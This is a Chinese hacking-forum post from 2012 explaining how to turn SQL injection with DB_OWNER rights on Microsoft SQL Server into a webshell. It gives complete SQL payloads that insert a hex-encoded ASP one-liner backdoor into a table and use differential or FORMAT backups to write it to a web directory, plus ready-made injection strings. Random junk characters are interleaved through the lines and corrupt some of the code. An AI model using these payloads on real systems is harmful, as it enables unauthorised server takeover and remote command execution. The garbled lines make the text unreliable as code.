找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2225|回复: 0
打印 上一主题 下一主题

DB_OWNER权限得到webshell的改进办法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 21:31:07 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
DB_OWNER权限得到webshell的两点改进:
/ [) V  m  d7 P
# t  c& \7 [! x6 a减少备份文件大小,得到可执行的webshell成功率提高不少) a2 \7 K# M( T* u' P
一利用差异备份
7 f, k$ H( X% i/ T% ?2 K8 k/ h, ?: Z加一个参数WITH DIFFERENTIAL' i1 v) t( j5 Z3 \( W

3 W0 l  Y# w& ?- v# D1$ Q' U/ h6 }8 Y& |$ S' n, D, N
2: r9 u: B$ L3 A% M$ ~6 i2 W$ O
32 P  Q+ I! s; C3 s( a
4; \4 K2 n/ ~) {" P  y! Y
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
& Q0 x( `5 ~2 Q5 |0 f  K! n0 Fcreate table [dbo].[xiaolu] ([cmd] [image]);6 M( ?# e8 p4 L3 W+ W. ^
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)' s1 ^; t# v# t9 Z3 K8 Q+ V5 G
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
. ?5 f7 l6 r7 @- O" {3 I, x
/ G# g# O, Y+ i, _二利用完全FORMAT
4 p) O5 l4 `' K) K, u. d加一个参数WITH FROMAT
7 X0 ~( F, E) ?+ b3 w有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以
+ K3 N2 k8 `% b9 S. W: k6 B, L1 _% h  H  ]* v& [8 ?
1
" ?  @# R8 b4 X" m* c% w2% @* V0 O0 n- s3 m
31 N- U5 P  m! G# N* T2 u
4: Z1 G, e2 l+ b: {% [9 A# Z
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s5 k& d. {- F' }: k* k7 A+ }
create table [dbo].[xiaolu] ([cmd] [image]);
& T* G& Z/ ]9 w2 `  h+ Ninsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
( `; M% B4 v+ Vdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT & y& u! V" L; c
% a8 f: d  J8 r
总的来说就是那么简单几句,下面以备份数据库model为例子4 a/ ]& o) B, o% L/ w1 ?/ ?
1* M) s4 v4 x+ y9 p* l

+ K8 N  ?/ \# P9 F! w! A3 I1
: j0 P7 ?/ j3 d* u id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
, v1 J* Z7 i% X9 D1 W; D; B7 K9 [, i* l+ p- Z1 l  b
2
. b7 Q- h% i6 h: B! {2 M$ e$ D5 c4 [) `9 E& C" `
1, ?+ U$ N8 P4 s: T- U6 n: x1 C' J
id=1;backup database model to disk='你的路径‘ with differential,format;--
) \2 s/ \, u0 R+ N# g
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表